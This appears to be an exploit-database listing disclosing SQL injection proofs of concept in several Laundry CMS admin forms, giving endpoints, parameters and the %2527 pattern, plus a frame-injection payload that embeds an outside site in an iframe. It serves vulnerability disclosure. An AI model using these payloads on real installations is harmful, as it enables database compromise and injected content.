header-logo
Suggest Exploit
vendor:
Laundry CMS
by:
Mehmet EMIROGLU
6.5
CVSS
MEDIUM
SQL Injection
89
CWE
Product Name: Laundry CMS
Affected Version From: New
Affected Version To: New
Patch Exists: NO
Related CWE: N/A
CPE: a:rpcits:laundry
Metasploit: N/A
Other Scripts: N/A
Platforms Tested: Wamp64, Windows
2019

Laundry CMS cloth_code SQL Inj.

The Laundry CMS is vulnerable to SQL Injection via the cloth_code and cloth_name parameters. An attacker can exploit this vulnerability by sending a crafted payload with the %2527 attack pattern to the http://localhost/laundry/index.php/admin/cloth_crud/create POST request.

Mitigation:

Input validation should be used to prevent SQL Injection attacks.
Source

Exploit-DB raw data:

===========================================================================================
# Exploit Title: Laundry CMS cloth_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : cloth_code, cloth_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/cloth_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address,
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/customer_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS Multiple SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : last_name, password, email, phone, first_name, status,
join_date, address, gender
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/employee_crud/new
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS expse_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : expse_code, expse_type, expse_id
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/expenses_crud/create
===========================================================================================
###########################################################################################
===========================================================================================
# Exploit Title: Laundry CMS service_code SQL Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very
simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - SQLi
# Parameters : service_code, service_name
# Attack Pattern : %2527
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create
===========================================================================================

===========================================================================================
# Exploit Title: Laundry CMS Multiple Frame Inj.
# Dork: N/A
# Date: 09-03-2019
# Exploit Author: Mehmet EMIROGLU
# Vendor Homepage: http://laundry.rpcits.co.in/
# Software Link: https://sourceforge.net/projects/laundry/
# Version: New
# Category: Webapps
# Tested on: Wamp64, Windows
# CVE: N/A
# Software Description: The Laundry Management Application is a very simple and Online Services
  with mobile and computer friendly themes development.
===========================================================================================
# POC - Frame Inj.
# Parameters : cloth_name, service_name, expse_type
# Attack Pattern : %3ciframe+src%3d%22http%3a%2f%2fcyber-warrior.org%2f%3f%22%3e%3c%2fiframe%3e 
# POST Method : http://localhost/laundry/index.php/admin/service_crud/create  
===========================================================================================

Navigation

Suggest Exploit

Services By CQR